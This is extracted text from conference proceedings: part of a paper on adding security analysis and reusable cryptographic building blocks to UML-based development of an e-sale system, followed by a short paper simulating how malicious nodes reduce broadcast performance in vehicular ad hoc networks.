The structure of the e-sale system is modeled by a collaboration, as shown in Fig. 1. It consists of two collaboration roles, customer and merchant, which denote the participants of the system. To make a purchase, these roles have to collaborate with each other, i.e., execute some joint behavior. This behavior is captured by the two collaboration uses o:Order and p:Payment, denoted by ellipses. The dashed lines are the role bindings specifying that the customer is the buyer during the order, and the payer during the payment. Vice versa, the merchant acts as a seller and a payee, respectively. While the collaboration in Fig. 1 specifies from which services the complete system is composed, the detailed dependencies between order and payment are not visible. For this purpose, we use the UML activity diagram shown in Fig. 2. «system» e-Sale buyer payer customer

o:Order p:Payment

seller payee merchant

Fig. 1. UML collaboration for the e-Sale system

74

L.A. Gunawan, P. Herrmann, and F.A. Kraemer «esm» Order

«system» e-Sale customer

start/

merchant

started

sCart: List

start

/products o: Order

selecting

/products+buy

buy/

products: List : List select products

ordering /finish

get sCart : List

buy: List

finish: Order : Order create invoice : Invoice

p: Payment

«esm» Payment start/

invoice: Invoice start: Invoice : Invoice display invoice and confirm

sucess pay

started confirm success

/invoice /invoice+pay

billed pay/

failed

validating display "failed"

confirm failed

/success

/failed

display "success"

Fig. 2. The behavior of the e-Sale system

Each participant in the system is represented by its own activity partition. The order and payment services from Fig. 1 are represented by the call behavior actions o:Order and p:Payment, referring to activity diagrams that define their detailed internal behavior, as we will see later. In contrast to the collaboration uses from Fig. 1, call behavior actions have pins at their borders which denote specific events that we can use for their composition. In order to understand the high-level interface behavior of the call behavior actions without looking into their internals, they are accompanied by special, external state machines (ESMs, [5]), shown to the right in Fig. 2. They define the externally observable behavior at the pins of a call behavior action. The e-sale system starts at the initial node in the customer side by triggering o:Order via its start pin. From the ESM for the order collaboration shown at the upper right in Fig. 2, we see that after a start, we have to be prepared for the arrival of the catalogue of products. The ESM allows that the response to the catalogue in the form of a buy list either happens with a delay (for example after the customer selecting via a user interface) or immediately. In the former case, the ESM declares the transition /products, leading into state selecting, from which transition buy/ leads into state ordering. For the system as specified in Fig. 2, we assume that the order is not delayed, but directly computed by the operations select products and get sCart. Since these operations are executed locally, they are processed within the same run-tocompletion step. This immediate return via buy is allowed by the ESM with the transition /products+buy. Note that products and buy are streaming parameter pins denoted in black, meaning that they can pass tokens while the collaboration is active.

Towards the Integration of Security Aspects into System Development

75

The o:Order collaboration will eventually finish on the merchant’s side via finish. This triggers the local operation create Invoice, which in turn triggers the start of the payment collaboration. From the ESM for the payment collaboration shown at the bottom right in Fig. 2, we see that this collaboration passes the invoice to the customer, who confirms the payment via pay. Since payment information may be invalid, this collaboration may terminate in two different ways, either via success or failed, upon which corresponding actions are invoked on the merchant and customer sides.

3

The Security-Enhanced Method

The creation of secure systems needs the combined effort of domain experts having in-depth knowledge of the application domain of a system and of security experts [7]. A straightforward way is that the domain-expert first develops a functionally correct, yet unprotected system. Thereafter, the security expert analyzes the system for vulnerabilities, threats and risks, and adds countermeasures hardening it against malicious attacks. This kind of security analysis is well-known since in the seventies [8]. More recently, model-based techniques for secure system development were introduced as well [9,10,11,12,13,14]. We also propose a technique based on UML [7,15,16], following the security analysis standard ISO/IEC Common Criteria [6]. The integration of the security analysis into the SPACE engineering methodology leads to the proceeding depicted in Fig. 3. There the domain expert is expressed by the simple person icon while the security expert is expressed by a person icon carrying a lock. First, the domain expert creates a functional system model by composing and analyzing a set of UML collaborations, activities and ESMs, as presented in Sect. 2. When the system is functionally correct, it is handed over to the security expert who enhances the system by performing a security analysis which consists of the following series of steps: Step 1. Valuation of assets and definition of security objectives. Step 2. Identification of weaknesses and threats.

1

Functional Design & Analysis Domain specific libraries

Executable Code

System specification

Security-aware system specification Code Generation

Model Transformation

2

Asset Valuation

Weakness &Threat Identification 3

Security Library 4

Countermeasure Design & Integration

Risk Assessment

risk is bearable

risk is NOT bearable

Fig. 3. Security-enhanced development method

Security Analysis

76

L.A. Gunawan, P. Herrmann, and F.A. Kraemer

Step 3. Assessment of the resulting risks. Step 4. Planning, design and evaluation of suitable countermeasures. Step 4 results in an extended system specification which of course may contain new vulnerabilities. Therefore, the analysis has to be reiterated with the extended system model at step 2 which may lead to further countermeasures protecting the original ones. The iteration is stopped in step 3 when all risks for the system are considered as bearable. The accomplishment of steps 2 and 3 can be supported by various tools based on graph transformation [15,16] as well as model checkers such as Scyther [17] and Casper/FDR [18]. The use of these tools, however, is not within the focus of this paper. The integration of countermeasures in step 4 is supported by a library of security building blocks. The library contains basic security primitives which can be used by the security expert to develop suitable countermeasures. Often used countermeasures are also stored in the library. Examples of security building blocks for basic security primitives and countermeasures are introduced later in Sect. 5. Thus, the security expert adds a countermeasure by utilizing the corresponding blocks of the library and composing them with the blocks modeling the system functionality. Sometimes the integration of a security mechanism changes the functionality of the system (see [7]). In that case, the domain expert has to repeat functional analysis for the extended system to check if the changes can be accepted. When the security expert decides that the risks of the resulting system are bearable, the system specification is transformed into a component-oriented model from which executable code is generated. For the reminder we assume that these two subsequent transformation steps do not add any further vulnerabilities.

4

Security Analysis of the e-Sale System

The e-sale system is implemented as two distributed components. The component for the merchant runs on a server and the customer component is deployed on a mobile device or a personal computer. Therefore, there are three parts that make up the e-sale system: the merchant application, the customer application and a communication channel between them, which we assume to be public. In the following, we focus on confidentiality and integrity issues in communication security. We assume that sufficiently strong access control (LDAP, X.509) is enforced in the devices running the system components such that direct attacks on the hosts are unlikely. Concerning availability, we assume an IDS is in place protecting the system against denial-of-service attacks. In step 1 of the security analysis, the security expert identifies that information exchanged between the components is an important asset. In UML activities, a message transmission is represented as activity flow crossing a partition border. These flows are hidden in the Order and Payment services such that the expert has to examine their details in addition to the system in Fig. 2. From the UML

Towards the Integration of Security Aspects into System Development

77

Order buyer start products: List buy: List

seller get catalogue : List

: List create order : Order

finish: Order

Fig. 4. UML activity for the Order service

activity for the Order service, depicted in Fig. 4, three types of information can be distinguished: a simple call message for the catalogue of products, the catalogue itself and the order data including information about the items to be purchased and the delivery address. In the Payment service (not shown in detail here), there are two types of messages: invoice data and payment information which includes the credit card number, cardholder name, expire date and card security code. In order to estimate the value of an asset, we attach properties related to the basic security objectives confidentiality and integrity to the asset. The magnitude of these properties describes the financial value of the asset and in correspondence the degree of protection needed. Since it is often difficult to estimate the true financial value of an asset, we use instead seven security levels which correspond to the evaluation assurance levels defined in the Common Criteria [6]. Level 1 should be assigned to the confidentiality property of information if the damage caused by revealing the information is only minor, while level 7 should be used if by eavesdropping leads to highly serious consequences particularly for the owner of the information. The security expert assigns level 1 to the confidentiality property of the catalogue of products in the e-sale example since it is intended to be publicly available so that everybody can read it easily. The same level also applies for the integrity property. In contrast, the order information has level 5 both for its confidentiality and integrity properties since revealing it to other entities leads to privacy issues and modifying the information also causes serious consequences for both the customer and the merchant. The same holds for the invoice information, while the payment information is rated with level 7 due to the severe consequences of eavesdropping the credit card information. In step 2 of the security analysis, weaknesses and threats of the system are identified by considering possible attacks. Since the communication channel is public, malicious entities can eavesdrop, alter and replay messages in the channel. All information exchanged is vulnerable since no protection has been applied yet. Thus, those attacks are all substantial threats. Based on the valuation of an asset and the seriousness of an attack on it, risk is calculated in step 3 of the security analysis. The matrix in Tab. 1 [7,15] is used

78

L.A. Gunawan, P. Herrmann, and F.A. Kraemer Table 1. Matrix for calculating risk values

Asset level 1 2 3 4 5 6 7

1 0 0 1 1 2 3 3

2 0 1 1 2 3 3 4

Threat level 3 4 5 6 1 1 2 3 1 2 3 3 2 3 3 4 3 3 4 5 3 4 5 5 4 5 5 6 5 5 6 7

7 3 4 5 5 6 7 7

to calculate the risk level. It reflects that risks in general depend on both the value of an asset and on the seriousness of the vulnerabilities and threats [19]. The risk level 0 means that no risk is assumed. For our e-sale example, since the confidentiality and integrity value of the catalogue of products is 1 and the threat seriousness level is 7, the risk level of this information is 3. For the order information, the result is 6 both for the confidentiality and integrity risks. Using a policy in which level 3 is considered bearable, this risk assessment shows that the risk of transmitting the catalogue can be accepted. However, the risks for the other three assets are too high. Therefore, we proceed to step 4 in which the security expert designs suitable countermeasures to mitigate the threats and integrates them into the system.

5

Security Specific Building Blocks

Several cryptographic techniques are typically used to protect messages in transit: Encryption can be employed to achieve confidentiality. Digital signature can be used to detect message modifications. Finally, adding nonces to messages thwarts replay attacks. One can use a combination of these three basic cryptographic primitives to protect the order, invoice and payment messages in the e-sale system. Thus, instead of sending a message msg in clear, the message is encoded in the form: {n|msg|{hash(n|msg)}KRs }KUr , where | represents concatenation of data, n is a nonce or a random value, hash() is a one-way hash function, {}KRs represents an encryption with the private key of the sender and {}KUr is an encryption with the public key of the receiver. The rest of this section will show how this solution is represented by SPACE building blocks. Some basic security primitives consist of some security operations that must be executed by a sender and a receiver to fulfill one or more security objectives. For example, to achieve message integrity, one can use a digital signature that consists of two operations: one for signing the message and the other for verifying the signature. These two operations are performed by the sender and the receiver respectively. We encapsulate this pair of operations in a single building block and put it in a library of basic security primitives in order to help the security expert to create more complex security mechanisms.

Towards the Integration of Security Aspects into System Development

79

Secure Message Transfer sender

Digital Signature sender plainIn :byte[]

sigOut: byte[]

receiver msg: byte[]

: byte[] sign : byte[]

: byte[] verify : boolean [false]

msgIn: byte[] sigIn: byte[]

plainIn noncedOut

plainOut

sigError

msgOut: byte[]

nonceError noncedIn

d: Digital Signature

[true] get msg : byte[]

receiver

n: Handle Nonce

plainIn

plainOut

sigOut

sigError

security Attack

sigIn plainOut: byte[]

e: Public Key Encryption plainIn chiperOut

plainOut cipherIn

Fig. 5. Building Block for Digital Signature and Secure Message Transfer

The building block for the security primitive digital signature is shown on the left part in Fig. 5. This block starts by receiving a token containing a message m to be signed via pin plainIn. Then, a call to an operation sign implementing the signing function is performed and a token is emitted via pin sigOut with a data in the form of m|{hash(m)}KRs . Sometimes later, the receiver receives the signed data via pin sigIn and verifies the signature {hash(m)}KRs in the operation verify. Further, it stores the original message m in the variable msg and outputs a Boolean value indicating whether the integrity of the message is preserved or not. According to the result, either the original message is given out via pin plainOut or a token is emitted via pin sigError. Note that the Digital Signature block does not itself specify any direct communication between its participants, but rather encapsulates corresponding operations. The operations sign and verify in the Digital Signature block contain Java code for a digital signature implementation with a particular algorithm. We utilize a set of APIs from Java Cryptography Architecture (JCA) [20] and Java Cryptography Extension (JCE) [21] for the implementation of cryptographic algorithms and other related materials such as encryption keys and public key certificates. It is of course possible to adapt the building block to use other secure implementations of cryptographic algorithms or keys. Building blocks for Public Key Encryption and Handle Nonce are also created. They are not shown here in detail, since those blocks are similar to the Digital Signature. The security expert then composes instances of these three blocks in order to create the block of security mechanism Secure Message Transfer, depicted on the right part in Fig. 5. A message transferred from the sender to the receiver in this block is protected in a way that the transmitted message is unintelligible for entities apart from the sender and the receiver as long as the private key of the receiver is not compromised. This block also guarantees that

80

L.A. Gunawan, P. Herrmann, and F.A. Kraemer

every message emitted via pin msgOut is always identical to the corresponding message received via msgIn as long as the private key of the sender is not jeopardized. Furthermore, if a malicious entity attempts to replay a message or make a modification on it, the receiver gets a notification via pin security Attack. Since this security mechanism can be used to secure other systems as well, this block is put in the library of security building blocks for further use. Moreover, the security expert may also use this block to create more complex and specific security mechanisms.

6

Secure e-Sale System

The secure message transfer mechanism is used to protect the exchanged messages containing the order, invoice and payment information in the e-sale system. Therefore, instances of the Secure Message Transfer block are composed with the Order and Payment services in order to produce a security-aware system specification. The Secure Order service, depicted on the upper right in Fig. 6, is the result of composing the security block with the Order service. Similarly, the Payment service is also extended, resulting in the Secure Payment service. Note that the Secure Message Transfer block indicates a security breach by emitting a token via pin securityAttack instead of giving out the transferred message. This has to be taken care of to keep the Secure Order and Secure Payment services consistent. For the Secure Order service, an alternative output pin securityAttack is added. This change alters the functional behavior of the e-sale system. The operation handle attack, which contains logging the attacks for further analysis, and the operation confirm failed, in which a notification of transaction failure is sent to the customer, are executed respectively in the event of a security breach as shown on the left part in Fig. 6. These enhancements are examined by the domain expert and functional analysis is performed once more to ensure that the secure e-sale system is functionally correct. Another round of the security analysis needs to be performed. A reiterated step 2 of the security analysis on the secure e-sale system shows that the same threats are still applicable. The malicious entities may still harm the system by eavesdropping, modifying and replaying messages transferred in the communication channel. However, since the security expert employs the secure message transfer to protect the order, invoice and payment information, the threat level is reduced to 1. In consequence, the risk level of those information is now 3 or less and thus bearable. Up to this point, both the domain and security experts are convinced that the secure e-sale system is functionally correct and adequately protected with respect to the risk assessment.1 As described previously, the subsequent implementation of the secure e-sale system is performed in two automated steps. First, it is transformed into a component-oriented model, expressed in executable state machines. Afterwards, 1

The unprotected transmission of the success respective failed information is also a vulnerability since an intruder can alter it. We do not discuss that here for brevity.

Towards the Integration of Security Aspects into System Development

81

Secure Order buyer start products: merchant List buy: List

seller get catalogue : List

«system» Secure e-Sale customer sCart: List

start so: Secure Order

: List create order

securityAttack

: Order

products: List

msgIn

: List select products get sCart : List

t: Secure Message Transfer

msgOut

security Attack finish: Order

securityAttack buy: List

finish: Order

sp: Secure Payment

: Order create invoice : Invoice

invoice: Invoice start: Invoice : Invoice display invoice and confirm

securityAttack handle attack

pay failed sucess

display "success"

confirm failed

confirm success

display "failed"

Fig. 6. The secure e-Sale system

a platform dependent executable code is generated from the state machines (see [3]). Then, the code including some security settings (e.g., digital certificates) can be deployed. Collaboration-oriented modeling in our approach facilitates the reuse of security solutions. From our development method, we can classify a security-aware system model into building blocks for security primitives and mechanisms obtained from the security library and thus intended to be reused, applicationrelated blocks and some adaptations needed as the result of security analysis. In order to estimate the degree of reuse related to security aspects we compute the ratio of the first category to the combination of the last two. Since our development activities consists of creating UML models and writing Java code in the call operation actions as well as other related code (e.g., class Order in the Secure Order block), we can estimate the reuse rate in terms of these two factors. For our secure e-sale system, we use three instances of the security-specific block Secure Message Transfer. This block contains the Digital Signature, the Public Key Encryption and the Handling Nonce blocks. The building blocks in the e-Sale system depicted in Fig. 2 are the application-related blocks, while some call operation actions, such as handle attack, and pins (e.g., security Attack ) constitute the adaptations. By calculating the number of UML elements and the number of lines of Java code in the system, we find that 68% of the elements and 32% of the code are reusable security solutions.

82

L.A. Gunawan, P. Herrmann, and F.A. Kraemer

Naturally, the degree of reuse depends on many factors. The complexity of security mechanisms is one of them. Moreover, different applications will also result in different reuse proportions. Overall, the reuse of security aspects and also the reuse proportion from functional models (see [5]) contribute to reducing the time and effort in developing security-aware systems.

7

Related Work

Although many experts agree on the importance of integrating security aspects early in the development of a secure system, in practice security is still treated as an add-on since currently there is no straightforward methodology and tool support to achieve this [22,23]. Nevertheless, several approaches towards this goal have been proposed. SecureUML [24,25] is an extension of UML to specify role-based access control policies. A model transformation can be applied to an extended UML diagram to generate system code that includes security infrastructure. Our work is different from this in that SecureUML is specific for access control. UMLsec [26] is an extension of UML that models security requirements, such as secrecy secure information flow, secure communication link, etc. as stereotypes, tagged values and constraints. This UML profile can be attached in model elements of UML diagrams. It provides a means to evaluate a UML specification for security. Our approach is different in that UMLsec does not facilitate reuse of a secure system specification. Moreover, it does not specify the automatic generation of code from design models. In aspect-oriented modeling, security mechanisms are described by aspects and are weaved into base specifications at join points. Mouheb et al. propose a mechanism to weave security aspects into UML 2.0 models at the design phase [27]. Georg et al. propose using the aspect-oriented technology in combination with misuse models in order to perform security analysis [28]. PavlichMariscal et al. propose an approach to extend UML with security diagrams that represent access control policies as aspects [29]. Our work is different in that the aspect-oriented method does not consider the changes of the functional behaviors of the systems after security aspects are weaved into base specifications. In addition, the CORAS method [30] that contains seven steps of security analysis was proposed. Recently, Refsdal and Stølen suggested an approach that extends a security analysis to include the measurement of related key indicators to determine the likelihood and consequences of unwanted incidents [14]. Differently from those work, our approach also covers the integration of security analysis into system design and implementation.

8

Concluding Remarks and Future Work

We propose an approach for integrating security aspects into system development using collaboration-oriented models. The approach extends the SPACE

Towards the Integration of Security Aspects into System Development

83

engineering method by including the asset-oriented security analysis. Particularly, we demonstrate how security analysis is performed on a collaborationoriented system specification and how security mechanisms are designed as collaboration models and integrated with the system specification. Our initial experience shows that the collaboration models of security solutions as presented in Sect. 5 are useful for developing security-aware systems efficiently. The building blocks hide the complexity of the security mechanisms facilitating their integration into the system specifications. Moreover, the security library facilitates reuse of some countermeasures and the design of more advanced security solutions. The approach presented in this paper is not only well-suited for job separation between domain specific experts and security experts, but also provides a mechanism to integrate the work of this two types of experts. Another benefit of this approach is that it allows security solutions to be integrated early in the development of secure systems. In the future, our approach will be extended in various ways. Of course, we will expand our libraries with building blocks for more complex security mechanisms like authentication, access control, and intrusion detection. Further, it is worthwhile to support carrying out the security analysis steps (see Sect. 3) by meaningful tools. The formal semantics of the SPACE method based on Temporal Logic makes it suitable to model checking. We already integrated a model checker for functional properties to SPACE (see [4]). Likewise, one can attach security-related checkers such as Scyther [17] that inspect the UML models for the existence of vulnerabilities. In addition, the graphical nature of the model descriptions in the form of UML collaborations and activities leads to the utilization of graph rewriting techniques. For example, in [15] we presented the use of graph rewriting for information flow analysis based on the Decentralized Labeling approach by Myers [31]. There, both information and components are attached with static or dynamic labels (see [32]). Special operators are used to check if information may reach components providing access to principals not allowed to read it. This approach can be added to our proposed method by attaching the labels to the components and to the edges over which the information is passed. The integration of security mechanisms can also be supported by graph rewriting. For instance, the adding of the building block Secure Message Transfer as a call behavior action can be realized by a quite simple graph rewriting rule which, e.g., transforms the model in Fig. 4 automatically to the Secure Order service in Fig. 6. These and further analysis extensions may help to reduce the costs of risk analysis and the integration of suitable security mechanisms to distributed systems. The lower costs may lead to a broader utilization of security analysis and, in consequence, help to increase the security quality standard of software in general.

84

L.A. Gunawan, P. Herrmann, and F.A. Kraemer

References 1. Anderson, R.J.: Security Engineering: A Guide to Building Dependable Distributed Systems. John Wiley & Sons, Inc., New York (2008) 2. Herrmann, P., Kraemer, F.A.: Design of Trusted Systems with Reusable Collaboration Models. In: Etalle, S., Marsh, S. (eds.) IFIPTM 2007. IFIP, vol. 238, pp. 317–332. Springer, Heidelberg (2007) 3. Kraemer, F.A.: Engineering Reactive Systems: A Compositional and Model-Driven Method Based on Collaborative Building Blocks. PhD thesis, Norwegian University of Science and Technology (August 2008) 4. Kraemer, F.A., Sl˚ atten, V., Herrmann, P.: Tool Support for the Rapid Composition, Analysis and Implementation of Reactive Services. Journal of Systems and Software (2009) 5. Kraemer, F.A., Herrmann, P.: Automated Encapsulation of UML Activities for Incremental Development and Verification. In: Sch¨ urr, A., Selic, B. (eds.) MODELS 2009. LNCS, vol. 5795. Springer, Heidelberg (2009) 6. ISO/IEC: Common Criteria for Information Technology Security Evaluation, International Standard ISO/IEC 15408 (1998) 7. Herrmann, P., Herrmann, G.: Security-Oriented Refinement of Business Processes. Electronic Commerce Research Journal 6(3-4), 305–335 (2006) 8. Baskerville, R.: Information Systems Security Design Methods: Implications for Information Systems Development. ACM Computing Surveys 25(4), 375–414 (1993) 9. Baskerville, R.: Designing Information Systems Security. Wiley & Sons, Chichester (1988) 10. CCTA: SSADM-CRAMM Subject Guide for SSADM Version 3 and CRAMM Version 2. CCTA, London (1991) 11. Kienzle, D.M., Wulf, W.A.: A Practical Approach to Security Assessment. In: Proceedings of the Workshop New Security Paradigms 1997, Lake District (1997) 12. Leiwo, J., Gamage, C., Zheng, Y.: Harmonizer — A Tool for Processing Information Security Requirements in Organization. In: Proceedings of the 3rd Nordic Workshop on Secure Computer Systems (NORDSEC 1998), Trondheim (1998) 13. Lund, M.S., den Braber, F., Stølen, K.: Maintaining Results from Security Assessments. In: Proceedings of the 7th European Conference on Software Maintenance and Reengineering (CSMR 2003), pp. 341–350. IEEE Computer Society Press, Los Alamitos (2003) 14. Refsdal, A., Stølen, K.: Employing key indicators to provide a dynamic risk picture with a notion of confidence. In: Trust Management III, Boston. Springer, Heidelberg (2009) 15. Herrmann, P.: Information Flow Analysis of Component-Structured Applications. In: Proceedings of the 17th Annual Computer Security Applications Conference (ACSAC 2001), New Orleans, pp. 45–54. IEEE Computer Society Press, Los Alamitos (2001) 16. Herrmann, P., Krumm, H.: Object-oriented security analysis and modeling. In: Proceedings of the 9th International Conference on Telecommunication Systems — Modelling and Analysis, Dallas, ATSMA, IFIP, March 2001, pp. 21–32 (2001) 17. http://people.inf.ethz.ch/cremersc/scyther/ 18. http://web.comlab.ox.ac.uk/people/gavin.lowe/Security/Casper/ 19. Courtney, R.: Security Risk Assessment in Electronic Data Processing. In: AFIPS Conference Proceedings of the National Computer Conference, vol. 46, Arlington, pp. 97–104 (1977)

Towards the Integration of Security Aspects into System Development

85

20. http://java.sun.com/javase/6/docs/technotes/guides/security/crypto/ CryptoSpec.html 21. http://java.sun.com/j2se/1.5.0/docs/guide/security/jce/ JCERefGuide.html 22. Siponen, M., Heikka, J.: Do secure information system design methods provide adequate modeling support? Information and Software Technology 50(9-10) (2008) 23. Vaughn Jr., R.B., Henning, R., Fox, K.: An empirical study of industrial securityengineering practices. Journal of System and Software 61(3), 225–232 (2002) 24. Basin, D., Doser, J., Lodderstedt, T.: Model driven security: From uml models to access control infrastructures. ACM Transactions on Software Engineering Methodology 15(1), 39–91 (2006) 25. Lodderstedt, T., Basin, D.A., Doser, J.: Secureuml: A uml-based modeling language for model-driven security. In: J´ez´equel, J.-M., Hussmann, H., Cook, S. (eds.) UML 2002. LNCS, vol. 2460, pp. 426–441. Springer, Heidelberg (2002) 26. J¨ urjens, J.: Secure System Development with UML. Springer, Heidelberg (2004) 27. Mouheb, D., Talhi, C., Lima, V., Debbabi, M., Wang, L., Pourzandi, M.: Weaving security aspects into uml 2.0 design models. In: AOM 2009: Proceedings of the 13th workshop on Aspect-oriented modeling, pp. 7–12. ACM, New York (2009) 28. Georg, G., Ray, I., Anastasakis, K., Bordbar, B., Toahchoodee, M., Houmb, S.H.: An aspect-oriented methodology for designing secure applications. Information and Software Technology 51(5), 846–864 (2009); SPECIAL ISSUE: Model-Driven Development for Secure Information Systems 29. Pavlich-Mariscal, J., Michel, L., Demurjian, S.: Enchancing uml to model custom security aspects. In: AOM 2007: Proceedings of the 11th workshop on Aspectoriented modeling (2007) 30. Braber, F., Hogganvik, I., Lund, M.S., Stølen, K., Vraalsen, F.: Model-based security analysis in seven steps — a guided tour to the coras method. BT Technology Journal 25(1), 101–117 (2007) 31. Myers, A.C.: JFlow: Practical Mostly-Static Information Flow Control. In: Proceedings of the 26th ACM Symposium on Principles of Programming Languages (POPL 1999), San Antonio (1999) 32. Zheng, L., Myers, A.C.: Dynamic security labels and static information flow control. International Journal of Information Security 6(2), 67–84 (2007)

Impact of Malicious Node on Broadcast Schemes Aneel Rahim and Fahad bin Muyaha PMC, King Saud University, Kingdom of Saudi Arabia [email protected], [email protected]

Abstract. Broadcast is frequently used operation in vehicular adhoc network (VANETs) for sharing traffic, weather, and safety information among vehicles. Relevance based approach forward high priority traffic for information sharing and removes the redundant and surplus messages. The relevance based approach depends upon the intermediate nodes and consider ideal scenario where there is no selfish and malicious node but it is not possible in real life scenario. We in this paper simulate the relevance based approach using NS-2 in a real scenario and consider the impact of malicious node and determine how much throughput of network is affected by malicious node.

1 Introduction A large number of Broadcast Techniques have been proposed for information sharing but they are not appropriate for VANETs as they have certain drawbacks like simple flooding [1] have shortcoming such as redundant rebroadcasts, collision and contention. Probabilistic scheme [2] is proposed to overcome the simple flooding problems but its performance is poor in sparse network as the nodes can’t get all messages until the probability is high and it works similar with simple flooding when its probability is high. Neighbor Knowledge method exchange hello packet to get neighbor information and hello packets degrades the network performance. If the interval of hello packet is short it will cause contention and collision and large interval influence the network performance due to mobility [3]. Multi hop Vehicular broadcast [4] have Scalability problem. All existing techniques also do not consider the importance of message except the relevance based approach. The relevance based approach depends upon the intermediate nodes for communication. All nodes in VANETs are considered as fair nodes [5] (forward the information to increase the global benefit regardless of their own benefit) but it is not possible in real life scenario. We in this paper simulate the relevance based approach in real scenario and consider the impact of malicious node on relevance based approach and determine how much throughput of network is affected by malicious node. This paper is organized as follows: In section 2, we discuss relevance based approach, its characteristics and its implementation using cross layer, 802.11e and 802.11e with virtual queue. In section 3, proposed study and results are presented using NS-2. Lastly in section 4 conclusions is given. D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 86–92, 2009. © Springer-Verlag Berlin Heidelberg 2009

Impact of Malicious Node on Broadcast Schemes

87

2 Related Work Relevance based approach is only scheme that forward important and relevant message for sharing and discard the surplus messages [6]. Due to high speed of vehicles, it is not possible for one vehicle to share all its information with other vehicles. It can select only important and relevant messages for broadcast. The relevance-based approach is consisting of two methodologies. First, calculate the relevance value of data packets. Secondly, forward the messages only according to their relevance value. [5][9] 2.1 Characteristics of Relevance Based Approach Altruism, Application-oriented information differentiation, Controlled Unfairness are some basic characteristics of relevance based approach [5] [7] [8].Altruism means nodes are not selfish and malicious. They forward the information to increase the global benefit regardless of their own benefit. Application-oriented information differentiation means that existing techniques depend on packet specific data but now we get the application oriented data to remove the redundant and surplus information. Controlled unfairness means message are forwarded according to their priority rather than the time they spent in queue.

Application Layer

Application Layer

Link Layer

Link Layer

Queue 13 8 7 5 2

Benefit Based Extension

MAC Layer

Queue 10 7 1 9 5

Benefit Based Extension

MAC Layer

Fig. 1. Cross layer design for Relevance based approach

88

A. Rahim and F.b. Muyaha

2.2 Cross Layer Implementation The cross layer design is used to implement the relevance based approach. Relevance of each message is calculated at application layer and that value is attached to message header before passing it to link layer. Benefit-based extension change the functionality of interface queue and medium access control and forward messages according to their priority by getting information from application layer through interlayer communication shown in figure 1 [5] [7]. 2.3 802.11e Implementation Relevance based approach can also be implement through 802.11e protocol [8] but it is not suitable due following shortcoming. Firstly the four queues of 802.11e do not give internal resorting of the packets in a packet queue. Packets are inserted into one of the four different priority queues according to their relevance value but for dequeuing it ignore the relevance value and follow only FIFO principle. Secondly they are no mechanism to assign a priority to a given packet. Sort packets into four queues are harmful, because data packets of different relevance value are inserted into the same queue. Thirdly the performance of global benefit decreases because packets of less importance more often get the medium than the high relevance value due to no internal contention of four queues.[5]

Fig. 2. 802.11e with virtual queue

Impact of Malicious Node on Broadcast Schemes

89

2.4 802.11e Implementation with Virtual Queue To overcome the above mention problems in 802.11e,four virtual queues are made at application level and packets are first enter into virtual queues according to their priorities and then queues are sorted. Most important messages are at the front of virtual queues. The length of 802.11e queues are adjusted equal to one or less than one. So the most important and relevant message is passed to the one of the queues of 802.11e. If there is a message in the queue of 802.11e and the upcoming message have value higher than message in 802.11e. The upcoming message is placed in 802.11e queue and the message already present that has low relevance value is swap to the virtual queue as shown in fig 2 [6].

3 Proposed Study and Results In this study we simulate the relevance based approach and calculate global benefit in ideal scenario that all nodes are doing their properly and there is no malicious node in the network. In the second scenario we consider the impact of malicious node and measure how much global benefit is decreased. The malicious nodes forward the relevant messages first but also inject some surplus information. In last scenario malicious node forward the surplus message first and ignore the relevant message. In order to validate the proposed study, we compare the performance of relevance based approach in real and ideal scenario with 802.11e protocol. NS-2, a network simulator [10], is used to simulate the behavior for relevance based approach in VANETs scenarios. We use Manhattan Mobility Model and traffic is generated by Generic Mobility Simulation Framework [11]. Vehicles are moving at a speed of 72Km/hr to 108 Km/hr within an area of 3000m x 3000m with transmission range of 300m. Performance of relevance based approach is measured by calculating the global benefit. Table 1. Simulation Parameters

Parameters channel Vehicles MAC protocol Time Routing Protocol

Settings wireless 100 802.11e 50s DSDV

Network Simulator is used for the simulation and different parameter used in the following study is given in Table 1. 3.1 Study 1 In this study we have 100 vehicles moving at fast speed and exchanging information as shown in Fig (3). In this study we calculate the Global Benefit by assuming that no

90

A. Rahim and F.b. Muyaha

Fig. 3. Global Benefit with 100 vehicles in ideal scenario

malicious node in network. Global Benefit is sum of all local benefits of vehicles during the simulation. So only the relevant and safety messages are forwarded in network and nodes try to improve the network benefit regardless of their own benefit. 3.2 Study 2 Fig (4) shows Global benefit of relevance based approach by considering the impact of malicious node. The scenario is same as above with 100 vehicles but the difference is that now we are considering the real scenario and malicious node may affect the performance of network. As the relevance based approach totally depends on intermediate node, so intermediate node can be malicious and it will decrease the global benefit badly. In this study the malicious nodes are intelligent and they inject the surplus information slowly in network. So they are not easily detectable. They forward the relevant message first and irrelevant. 3.3 Study 3 In this study the malicious nodes try to decrease the network performance as much as possible. The scenario is same as above with 100 vehicles. Global Benefit measured in this study is quite low than study2 and study 3 as show in fig 5 below. The

Impact of Malicious Node on Broadcast Schemes

91

Fig. 4. Global Benefit with 100 vehicles in real scenario (intelligent malicious node)

Fig. 5. Global Benefit with 100 vehicles in real scenario

malicious in this scenario forward the surplus messages first and assign the lower priority to safety messages by using 802.11e protocol.

92

A. Rahim and F.b. Muyaha

4 Conclusion Relevance based approach rely on intermediate node for communication so it consider there is no selfish node exist in network. However it is not possible in real scenario. We in this paper simulate the relevance based approach and consider the impact of selfish node and determine that global benefit is decreased gradually when we consider the malicious node.

Acknowledgments This research was supported by the Prince Muqrin Chair (PMC) for IT Security at King Saud University, Riyadh, Saudi Arabia.

